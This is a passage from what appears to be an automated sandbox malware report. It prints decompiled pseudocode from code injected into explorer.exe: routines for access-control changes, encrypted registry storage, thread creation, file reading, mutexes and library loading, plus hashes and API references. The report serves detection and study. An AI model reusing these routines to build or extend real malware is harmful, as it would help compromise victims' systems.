lstrcatA.KERNEL32(00000000,000FB99C,000E5731,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,000E5731), ref: 000E2B30

Strings

%u;%u;%u, xrefs: 000E2B4C

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeaplstrcat
String ID: %u;%u;%u
API String ID: 3011335133-2973439046
Opcode ID: 3e53ea5b8a22dd7e2ee4a1428e0493cba95d6cad62b9d98657f0f9703c99e035
Instruction ID: 818f080174a3b2c41b975047d2c3a979b64340d11b672b3f9fada42cfb6f03e5
Opcode Fuzzy Hash: 3e53ea5b8a22dd7e2ee4a1428e0493cba95d6cad62b9d98657f0f9703c99e035
Instruction Fuzzy Hash: D4112932A00344AFDB15EFAADCC4EBA7BBDFB84310B104929E601E71A1DF389900DB50

Uniqueness

Uniqueness Score: -1.00%

Function 000EBD52, Relevance: 3.1, APIs: 2, Instructions: 149
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E000EBD52() {
				char _v8;
				void* _v12;
				char _v16;
				short _v20;
				char _v24;
				short _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v88;
				intOrPtr _v92;
				void _v96;
				intOrPtr _t58;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t70;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t87;
				signed int _t90;
				void* _t92;
				intOrPtr _t93;
				void* _t98;

				_t90 = 8;
				_v28 = 0xf00;
				_v32 = 0;
				_v24 = 0;
				memset( &_v96, 0, _t90 << 2);
				_v20 = 0x100;
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v16 = 0;
				_push(0);
				_v8 = 0;
				_push(1);
				_v12 = 0;
				_push( &_v24);
				_t58 =  *0xfe68c; // 0x25bfab8
				_t98 = 0;
				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
					L14:
					if(_v8 != 0) {
						_t67 =  *0xfe68c; // 0x25bfab8
						 *((intOrPtr*)(_t67 + 0x10))(_v8);
					}
					if(_v12 != 0) {
						_t65 =  *0xfe68c; // 0x25bfab8
						 *((intOrPtr*)(_t65 + 0x10))(_v12);
					}
					if(_t98 != 0) {
						_t63 =  *0xfe684; // 0x25bf8f0
						 *((intOrPtr*)(_t63 + 0x34))(_t98);
					}
					if(_v16 != 0) {
						_t61 =  *0xfe684; // 0x25bf8f0
						 *((intOrPtr*)(_t61 + 0x34))(_v16);
					}
					L22:
					return _t98;
				}
				_v68 = _v12;
				_t70 =  *0xfe688; // 0x80000
				_t92 = 2;
				_v96 = 0x1fffff;
				_v92 = 0;
				_v88 = 3;
				_v76 = 0;
				_v72 = 5;
				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
						goto L7;
					}
					goto L4;
				} else {
					L4:
					_push( &_v8);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(1);
					_push(_t92);
					_push(_t92);
					_push( &_v32);
					_t85 =  *0xfe68c; // 0x25bfab8
					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
						goto L14;
					} else {
						_t87 = _v8;
						if(_t87 != 0) {
							_push(2);
							_pop(1);
							_v64 = 0x1fffff;
							_v60 = 1;
							_v56 = 3;
							_v44 = 0;
							_v40 = 1;
							_v36 = _t87;
						}
						L7:
						_push( &_v16);
						_push(0);
						_push( &_v96);
						_t73 =  *0xfe68c; // 0x25bfab8
						_push(1); // executed
						if( *((intOrPtr*)(_t73 + 8))() != 0) {
							goto L14;
						}
						_t98 = LocalAlloc(0x40, 0x14);
						if(_t98 == 0) {
							goto L14;
						}
						_t93 =  *0xfe68c; // 0x25bfab8
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
							goto L14;
						}
						_t77 =  *0xfe68c; // 0x25bfab8
						_push(0);
						_push(_v16);
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
							goto L14;
						}
						if(_v8 != 0) {
							_t81 =  *0xfe68c; // 0x25bfab8
							 *((intOrPtr*)(_t81 + 0x10))(_v8);
						}
						_t79 =  *0xfe68c; // 0x25bfab8
						 *((intOrPtr*)(_t79 + 0x10))(_v12);
						goto L22;
					}
				}
			}

0x000ebd5d
0x000ebd60
0x000ebd68
0x000ebd6e
0x000ebd71
0x000ebd76
0x000ebd7c
0x000ebd7d
0x000ebd7e
0x000ebd7f
0x000ebd80
0x000ebd81
0x000ebd82
0x000ebd83
0x000ebd86
0x000ebd89
0x000ebd8b
0x000ebd8e
0x000ebd92
0x000ebd95
0x000ebd96
0x000ebd9b
0x000ebda2
0x000ebe96
0x000ebe9a
0x000ebe9c
0x000ebea4
0x000ebea4
0x000ebeab
0x000ebead
0x000ebeb5
0x000ebeb5
0x000ebeba
0x000ebebc
0x000ebec2
0x000ebec2
0x000ebec9
0x000ebecb
0x000ebed3
0x000ebed3
0x000ebed7
0x000ebedc
0x000ebedc
0x000ebdad
0x000ebdb0
0x000ebdb7
0x000ebdb8
0x000ebdbf
0x000ebdc2
0x000ebdc9
0x000ebdcc
0x000ebdd7
0x000ebde2
0x00000000
0x00000000
0x00000000
0x000ebde4
0x000ebde4
0x000ebde7
0x000ebde8
0x000ebde9
0x000ebdea
0x000ebdeb
0x000ebdec
0x000ebded
0x000ebdee
0x000ebdf0
0x000ebdf1
0x000ebdf5
0x000ebdf6
0x000ebe00
0x00000000
0x000ebe06
0x000ebe06
0x000ebe0b
0x000ebe0d
0x000ebe0f
0x000ebe10
0x000ebe17
0x000ebe1a
0x000ebe21
0x000ebe24
0x000ebe27
0x000ebe27
0x000ebe2a
0x000ebe2d
0x000ebe2e
0x000ebe32
0x000ebe33
0x000ebe38
0x000ebe3e
0x00000000
0x00000000
0x000ebe4a
0x000ebe4e
0x00000000
0x00000000
0x000ebe50
0x000ebe56
0x000ebe58
0x000ebe61
0x00000000
0x00000000
0x000ebe63
0x000ebe68
0x000ebe69
0x000ebe6c
0x000ebe6e
0x000ebe77
0x00000000
0x00000000
0x000ebe7c
0x000ebe7e
0x000ebe86
0x000ebe86
0x000ebe89
0x000ebe91
0x00000000
0x000ebe91
0x000ebe00

APIs

SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 000EBE39
LocalAlloc.KERNEL32(00000040,00000014), ref: 000EBE44

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: AllocEntriesLocal
String ID:
API String ID: 2146116654-0
Opcode ID: 533cb2446b2eb3b0594bd868831cc1d82aed88536386766212d80ebc841d817f
Instruction ID: 8c79ba8d493c53f7c1834fb091491bbc6203db9c09f1ffd6415faeb193584944
Opcode Fuzzy Hash: 533cb2446b2eb3b0594bd868831cc1d82aed88536386766212d80ebc841d817f
Instruction Fuzzy Hash: 27513C71900248EFDB14CF9AD988AEEBBF8FF44701F15816AF604EB260D7749A44DB51

Uniqueness

Uniqueness Score: -1.00%

Function 000EA076, Relevance: 3.1, APIs: 2, Instructions: 146
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E000EA076(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
				char* _v12;
				char _v16;
				int _v20;
				signed int _v24;
				intOrPtr _v28;
				char* _v32;
				char _v52;
				char _v64;
				char _v328;
				char _v2832;
				signed int _t48;
				signed int _t49;
				char* _t54;
				long _t73;
				long _t80;
				long _t83;
				intOrPtr _t84;
				void* _t88;
				char* _t89;
				intOrPtr _t90;
				void* _t103;
				void* _t104;
				char* _t106;
				intOrPtr _t107;
				char _t108;

				_t48 = __ecx;
				_t89 = __edx;
				_v24 = __ecx;
				if(_a4 == 0 || _a8 == 0) {
					L13:
					_t49 = _t48 | 0xffffffff;
					__eflags = _t49;
					return _t49;
				} else {
					_t115 = __edx;
					if(__edx == 0) {
						goto L13;
					}
					_t107 =  *((intOrPtr*)(__ecx + 0x108));
					_push(_t107);
					_t103 = 4;
					_v12 = __edx;
					_v28 = E000ED442( &_v12, _t103);
					_t93 = _t107 + __edx;
					E000F2339(_t107 + __edx,  &_v2832);
					_t54 = E000F2465(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
					_t108 = _a8;
					_v12 = _t54;
					_v20 = _t54 + 6 + _t108;
					_t106 = E000E85E5(_t54 + 6 + _t108);
					_v32 = _t106;
					if(_t106 != 0) {
						 *_t106 = _a12;
						_t16 =  &(_t106[6]); // 0x6
						_t106[1] = 1;
						_t106[2] = _t108;
						E000E86C2(_t16, _a4, _t108);
						_t21 = _t108 + 6; // 0x6
						E000F230B( &_v2832, _t21 + _t106, _v12);
						_v16 = _t89;
						_t90 = _v24;
						_v12 =  *((intOrPtr*)(_t90 + 0x108));
						_push( &_v52);
						_t104 = 8;
						E000EF4D2( &_v16, _t104);
						E000EEB03( &_v16,  &_v52, 0x14,  &_v328);
						E000EEB70(_t106, _v20,  &_v328);
						_t73 = E000E9AEF(_t90);
						_v12 = _t73;
						__eflags = _t73;
						if(_t73 != 0) {
							E000E9781(_v28,  &_v64, 0x10);
							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
							__eflags = _t80;
							if(_t80 == 0) {
								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
								__eflags = _t83;
								if(_t83 != 0) {
									_push(0xfffffffc);
									_pop(0);
								}
								_t84 =  *0xfe68c; // 0x25bfab8
								 *((intOrPtr*)(_t84 + 0x1c))(_a4);
							} else {
								_push(0xfffffffd);
								_pop(0);
							}
							E000E85FB( &_v12, 0xffffffff);
						}
						E000E85FB( &_v32, 0);
						return 0;
					}
					_t88 = 0xfffffffe;
					return _t88;
				}
			}

0x000ea083
0x000ea088
0x000ea08a
0x000ea08d
0x000ea1fc
0x000ea1fc
0x000ea1fc
0x00000000
0x000ea09d
0x000ea09d
0x000ea09f
0x00000000
0x00000000
0x000ea0a5
0x000ea0ae
0x000ea0b1
0x000ea0b2
0x000ea0ba
0x000ea0bd
0x000ea0c8
0x000ea0d8
0x000ea0dd
0x000ea0e0
0x000ea0e9
0x000ea0f1
0x000ea0f6
0x000ea0fb
0x000ea108
0x000ea10a
0x000ea111
0x000ea116
0x000ea119
0x000ea121
0x000ea12e
0x000ea133
0x000ea139
0x000ea142
0x000ea148
0x000ea14b
0x000ea14c
0x000ea15e
0x000ea16e
0x000ea17a
0x000ea17f
0x000ea182
0x000ea184
0x000ea18e
0x000ea1a9
0x000ea1ac
0x000ea1ae
0x000ea1c9
0x000ea1cc
0x000ea1ce
0x000ea1d0
0x000ea1d2
0x000ea1d2
0x000ea1d3
0x000ea1db
0x000ea1b0
0x000ea1b0
0x000ea1b2
0x000ea1b2
0x000ea1e4
0x000ea1ea
0x000ea1f1
0x00000000
0x000ea1f8
0x000ea0ff
0x00000000
0x000ea0ff

APIs

Part of subcall function 000F2465: _ftol2_sse.MSVCRT ref: 000F24C6

Part of subcall function 000E85E5: RtlAllocateHeap.NTDLL(00000008,?,?,000E8F65,00000100,?,000E5FAC), ref: 000E85F3

RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 000EA1A9

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeapOpen_ftol2_sse
String ID:
API String ID: 3756893521-0
Opcode ID: 0fbda8a949a85170c3cb907e97c6d423763c404e761d37289c8e521c48f169d0
Instruction ID: 24adb0adfcdb16bf1dca0fa1b9fa2918c927cc01ecbb134952cf12af44653a96
Opcode Fuzzy Hash: 0fbda8a949a85170c3cb907e97c6d423763c404e761d37289c8e521c48f169d0
Instruction Fuzzy Hash: E551A172A00259AFCF10DF95CC85FEEBBB8AF09320F108266F515E7191EB70A684CB51

Uniqueness

Uniqueness Score: -1.00%

Function 000E98CF, Relevance: 3.1, APIs: 2, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E000E98CF(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				struct _SECURITY_ATTRIBUTES* _t58;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				struct _SECURITY_ATTRIBUTES* _t73;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr _t83;
				void* _t86;
				intOrPtr _t87;
				intOrPtr _t89;
				signed int _t92;
				intOrPtr _t97;
				intOrPtr _t98;
				int _t106;
				intOrPtr _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_push(__ecx);
				_push(__ecx);
				_v8 = __edx;
				_v12 = __ecx;
				_t77 =  *0xfe76c; // 0x1cc
				_t73 = 0;
				if(E000EA501(_t77, 0x7530) >= 0) {
					_t45 =  *0xfe770; // 0x2542418
					_t112 = 0;
					_t106 = 0;
					do {
						_t78 =  *((intOrPtr*)(_t106 + _t45));
						if(_t78 == 0) {
							L6:
							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
								_t113 = _t112 << 5;
								if(_v8 == _t73) {
									 *(_t113 + _t45 + 0x10) = _t73;
									_t46 =  *0xfe770; // 0x2542418
									 *(_t113 + _t46 + 0xc) = _t73;
									L14:
									_t79 =  *0xfe770; // 0x2542418
									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
									_t48 =  *0xfe770; // 0x2542418
									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
									_t49 = E000EA4B3(0, 1);
									_t82 =  *0xfe770; // 0x2542418
									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
									_t83 =  *0xfe770; // 0x2542418
									_t30 = _t83 + _t113 + 4; // 0x254241c
									_t52 = CreateThread(_t73, _t73, E000E9887, _t83 + _t113, _t73, _t30);
									_t53 =  *0xfe770; // 0x2542418
									 *(_t113 + _t53) = _t52;
									_t54 =  *0xfe770; // 0x2542418
									_t86 =  *(_t113 + _t54);
									if(_t86 != 0) {
										SetThreadPriority(_t86, 0xffffffff);
										_t87 =  *0xfe770; // 0x2542418
										 *0xfe774 =  *0xfe774 + 1;
										E000EA51D( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
										_t74 =  *0xfe770; // 0x2542418
										_t73 = _t74 + _t113;
									} else {
										_t59 =  *0xfe684; // 0x25bf8f0
										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
										_t61 =  *0xfe770; // 0x2542418
										_t37 = _t61 + 0xc; // 0x2542424
										_t91 = _t37 + _t113;
										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
											E000E85FB(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
											_t61 =  *0xfe770; // 0x2542418
										}
										_t92 = 8;
										memset(_t113 + _t61, 0, _t92 << 2);
									}
									L19:
									_t89 =  *0xfe76c; // 0x1cc
									E000EA51D(_t89);
									_t58 = _t73;
									L20:
									return _t58;
								}
								_t110 = _a4;
								_t65 = E000E85E5(_t110);
								_t97 =  *0xfe770; // 0x2542418
								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
								_t66 =  *0xfe770; // 0x2542418
								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
									goto L19;
								}
								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
								_t67 =  *0xfe770; // 0x2542418
								E000E86C2( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
								_t115 = _t115 + 0xc;
								goto L14;
							}
							goto L7;
						}
						_t69 =  *0xfe684; // 0x25bf8f0
						_push(_t73);
						_push(_t78);
						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
							_t45 =  *0xfe770; // 0x2542418
							goto L7;
						}
						_t98 =  *0xfe770; // 0x2542418
						E000E982B(_t106 + _t98, 0);
						_t45 =  *0xfe770; // 0x2542418
						goto L6;
						L7:
						_t106 = _t106 + 0x20;
						_t112 = _t112 + 1;
					} while (_t106 < 0x1000);
					goto L19;
				}
				_t58 = 0;
				goto L20;
			}

0x000e98d2
0x000e98d3
0x000e98d4
0x000e98dc
0x000e98df
0x000e98e6
0x000e98ef
0x000e98f8
0x000e98ff
0x000e9901
0x000e9903
0x000e9903
0x000e9908
0x000e9930
0x000e9933
0x000e994d
0x000e9953
0x000e9993
0x000e9997
0x000e999c
0x000e99a0
0x000e99a0
0x000e99ac
0x000e99b0
0x000e99b8
0x000e99be
0x000e99c3
0x000e99c9
0x000e99cd
0x000e99d5
0x000e99e7
0x000e99ec
0x000e99f1
0x000e99f4
0x000e99f9
0x000e99fe
0x000e9a3a
0x000e9a40
0x000e9a46
0x000e9a50
0x000e9a55
0x000e9a5b
0x000e9a00
0x000e9a04
0x000e9a09
0x000e9a0c
0x000e9a11
0x000e9a14
0x000e9a18
0x000e9a1f
0x000e9a24
0x000e9a2a
0x000e9a32
0x000e9a33
0x000e9a33
0x000e9a5d
0x000e9a5d
0x000e9a63
0x000e9a69
0x000e9a6c
0x000e9a6e
0x000e9a6e
0x000e9955
0x000e9959
0x000e995f
0x000e9965
0x000e9969
0x000e9972
0x00000000
0x00000000
0x000e9978
0x000e997c
0x000e9989
0x000e998e
0x00000000
0x000e998e
0x00000000
0x000e9933
0x000e990a
0x000e990f
0x000e9910
0x000e9919
0x000e9946
0x00000000
0x000e9946
0x000e991b
0x000e9926
0x000e992b
0x00000000
0x000e9935
0x000e9935
0x000e9938
0x000e9939
0x00000000
0x000e9941
0x000e98f1
0x00000000

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1948b0bad4eba91987fdf4d54c44094c23f239226d994647d6db0b67f8247ee4
Instruction ID: c58710f6b2f32bea000636ba856c542edc2314475f557565f645826a43d8b428
Opcode Fuzzy Hash: 1948b0bad4eba91987fdf4d54c44094c23f239226d994647d6db0b67f8247ee4
Instruction Fuzzy Hash: D6515C72614780DFE769EF2AEC80876B3EAFB49314354492DE446D3672CA34B902DB41

Uniqueness

Uniqueness Score: -1.00%

Function 000EA6EB, Relevance: 3.1, APIs: 2, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E000EA6EB(void* __ecx, signed int _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t34;
				intOrPtr* _t39;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t58;
				char _t60;

				_push(__ecx);
				_push(__ecx);
				_t50 = _a4;
				_t60 = 0;
				_v12 = 0;
				if(_a4 != 0) {
					_t47 = E000EA67D(_t50);
					if(_t47 == 0) {
						L11:
						_t26 = 0;
						L12:
						L13:
						return _t26;
					}
					_t27 =  *0xfe684; // 0x25bf8f0
					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
					if(_t58 == 0) {
						L9:
						_t29 =  *0xfe684; // 0x25bf8f0
						 *((intOrPtr*)(_t29 + 0x30))(_t47);
						if(_t60 != 0) {
							E000E85FB( &_v12, 0);
						}
						goto L11;
					}
					_t4 = _t58 + 1; // 0x1
					_t34 = E000E85E5(_t4); // executed
					_t60 = _t34;
					_v12 = _t60;
					if(_t60 == 0) {
						goto L9;
					}
					_a4 = _a4 & 0;
					_push(0);
					_v8 = 0;
					_push( &_a4);
					_push(_t58);
					_push(_t60);
					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
						if(_a4 == 0) {
							if(_v8 != _t58) {
								goto L9;
							}
							_t39 = _a8;
							 *((char*)(_t58 + _t60)) = 0;
							if(_t39 != 0) {
								 *_t39 = _t58;
							}
							CloseHandle(_t47);
							_t26 = _t60;
							goto L12;
						}
						_t55 = _v8 + _a4;
						_a4 = _a4 & 0x00000000;
						_push(0);
						_push( &_a4);
						_v8 = _t55;
						_push(_t58 - _t55);
						_push(_t55 + _t60);
					}
					goto L9;
				}
				_t26 = 0;
				goto L13;
			}

0x000ea6ee
0x000ea6ef
0x000ea6f0
0x000ea6f4
0x000ea6f6
0x000ea6fb
0x000ea70b
0x000ea70f
0x000ea799
0x000ea799
0x000ea79b
0x000ea79d
0x000ea79f
0x000ea79f
0x000ea715
0x000ea723
0x000ea727
0x000ea77f
0x000ea77f
0x000ea785
0x000ea78a
0x000ea792
0x000ea798
0x00000000
0x000ea78a
0x000ea729
0x000ea72d
0x000ea732
0x000ea734
0x000ea73a
0x00000000
0x00000000
0x000ea73e
0x000ea741
0x000ea742
0x000ea748
0x000ea749
0x000ea74a
0x000ea76f
0x000ea751
0x000ea7a3
0x00000000
0x00000000
0x000ea7a5
0x000ea7a8
0x000ea7ae
0x000ea7b0
0x000ea7b0
0x000ea7b8
0x000ea7bb
0x00000000
0x000ea7bb
0x000ea759
0x000ea75c
0x000ea760
0x000ea762
0x000ea765
0x000ea76a
0x000ea76e
0x000ea76e
0x00000000
0x000ea76f
0x000ea6fd
0x00000000

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,000EFA98,00000000,000EF8F7,0007EFE0,000FB98C,00000000,000FB98C,00000000,00000000,00000615), ref: 000EA775
CloseHandle.KERNELBASE(00000000,?,000EFA98,00000000,000EF8F7,0007EFE0,000FB98C,00000000,000FB98C,00000000,00000000,00000615,0000034A,00000000,025BFD30,00000400), ref: 000EA7B8

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: CloseFileHandleRead
String ID:
API String ID: 2331702139-0
Opcode ID: 671f35382d97da12d0780b0b29d5168a1eef8d28f911e1ea1d8469f5ed4395a7
Instruction ID: 6aa835cd141988426012c9b862ab004a20a2e9776085cd52987bec7a10059785
Opcode Fuzzy Hash: 671f35382d97da12d0780b0b29d5168a1eef8d28f911e1ea1d8469f5ed4395a7
Instruction Fuzzy Hash: AE21A276704249AFDB51CF65CC84FAA77FCAF59740F11406AF905E7111EA30EA40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 000E1521, Relevance: 3.1, APIs: 2, Instructions: 69
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E000E1521(void* __ecx, void* __edx) {
				void* _v8;
				void* _t3;
				signed int _t4;
				intOrPtr _t7;
				signed int _t9;
				intOrPtr _t10;
				void* _t24;

				_push(__ecx);
				_t3 = CreateMutexA(0, 0, 0);
				 *0xfe6f4 = _t3;
				if(_t3 == 0) {
					L11:
					_t4 = _t3 | 0xffffffff;
					__eflags = _t4;
				} else {
					_t3 = CreateMutexA(0, 0, 0);
					 *0xfe6dc = _t3;
					if(_t3 == 0) {
						goto L11;
					} else {
						_t3 = E000E1080(0x4ac);
						_v8 = _t3;
						if(_t3 == 0) {
							goto L11;
						} else {
							 *0xfe6e8 = E000E9187(_t3, 0);
							E000E85A3( &_v8);
							_t7 = E000E85E5(0x100);
							 *0xfe6f0 = _t7;
							if(_t7 != 0) {
								 *0xfe6fc = 0;
								_t9 = E000E85E5(0x401);
								 *0xfe6d4 = _t9;
								__eflags = _t9;
								if(_t9 != 0) {
									__eflags =  *0xfe6c0; // 0x0
									if(__eflags == 0) {
										E000F15EE(0xe81e3, 0xe81ec);
									}
									_push(0x61e);
									_t24 = 8;
									_t10 = E000EE1FE(0xfbd20, _t24); // executed
									 *0xfe6a0 = _t10;
									_t4 = 0;
								} else {
									_push(0xfffffffc);
									goto L5;
								}
							} else {
								_push(0xfffffffe);
								L5:
								_pop(_t4);
							}
						}
					}
				}
				return _t4;
			}

0x000e1524
0x000e152b
0x000e1531
0x000e1538
0x000e15ed
0x000e15ed
0x000e15ed
0x000e153e
0x000e1541
0x000e1547
0x000e154e
0x00000000
0x000e1554
0x000e1559
0x000e155e
0x000e1563
0x00000000
0x000e1569
0x000e1575
0x000e157a
0x000e1584
0x000e1589
0x000e1591
0x000e159f
0x000e15a5
0x000e15aa
0x000e15b0
0x000e15b2
0x000e15b8
0x000e15be
0x000e15ca
0x000e15d0
0x000e15d1
0x000e15d8
0x000e15de
0x000e15e3
0x000e15e8
0x000e15b4
0x000e15b4
0x00000000
0x000e15b4
0x000e1593
0x000e1593
0x000e1595
0x000e1595
0x000e1595
0x000e1591
0x000e1563
0x000e154e
0x000e15f2

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,000E56FA), ref: 000E152B
CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,000E56FA), ref: 000E1541

Part of subcall function 000E85E5: RtlAllocateHeap.NTDLL(00000008,?,?,000E8F65,00000100,?,000E5FAC), ref: 000E85F3

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateMutex$AllocateHeap
String ID:
API String ID: 704353917-0
Opcode ID: 1d6058e3904673716a8ec106131850ae9c92e694a50ad5c1780d7a8e3bd4bdfb
Instruction ID: d285190e7593653f84aff524a0cbd0a4534be5e954b082b18f56be958fd904c6
Opcode Fuzzy Hash: 1d6058e3904673716a8ec106131850ae9c92e694a50ad5c1780d7a8e3bd4bdfb
Instruction Fuzzy Hash: F2110872A04BCAEEF7549B77EC018BA36E5DBD17A07204229E512E65E1FF74C600D711

Uniqueness

Uniqueness Score: -1.00%

Function 000EE1FE, Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E000EE1FE(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E000E95A8(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E000EE1B3(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E000E85A3( &_v8);
				return _t25;
			}

0x000ee201
0x000ee204
0x000ee20a
0x000ee20c
0x000ee211
0x000ee213
0x000ee21d
0x000ee21e
0x000ee22d
0x000ee220
0x000ee220
0x000ee220
0x000ee231
0x000ee238
0x000ee23e
0x000ee23e
0x000ee243
0x000ee24e

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,000FBA20), ref: 000EE220
LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,000FBA20), ref: 000EE22D

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 1170ec84da607330d896594288af74fc4ad55e29d8dc4935a55431b170496bc8
Instruction ID: d66e9b6b4c739f46d54837b109a78dad6a13c930209c31ee6409ee5fc7cfc379
Opcode Fuzzy Hash: 1170ec84da607330d896594288af74fc4ad55e29d8dc4935a55431b170496bc8
Instruction Fuzzy Hash: 88F0AE327001989FD7446FAEEC458D9B3DC9F94350714416DF505F7161DEB4DE408794

Uniqueness

Uniqueness Score: -1.00%

Function 000E2C82, Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E000E2C82(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				WCHAR* _v8;
				char _v12;
				char _v44;
				char _v564;
				char _v1084;
				void* __esi;
				void* _t23;
				struct _SECURITY_ATTRIBUTES* _t25;
				int _t27;
				char _t32;
				char _t38;
				intOrPtr _t39;
				void* _t40;
				WCHAR* _t41;
				void* _t54;
				char* _t60;
				char* _t63;
				void* _t70;
				WCHAR* _t71;
				intOrPtr* _t73;

				_t70 = __ecx;
				_push(__ecx);
				E000EB742(__edx,  &_v44, __eflags, __fp0);
				_t52 = _t70;
				if(E000EBBCF(_t70) == 0) {
					_t23 = E000E2B97( &_v1084, _t70, 0x104); // executed
					_pop(_t54);
					__eflags = _t23;
					if(__eflags == 0) {
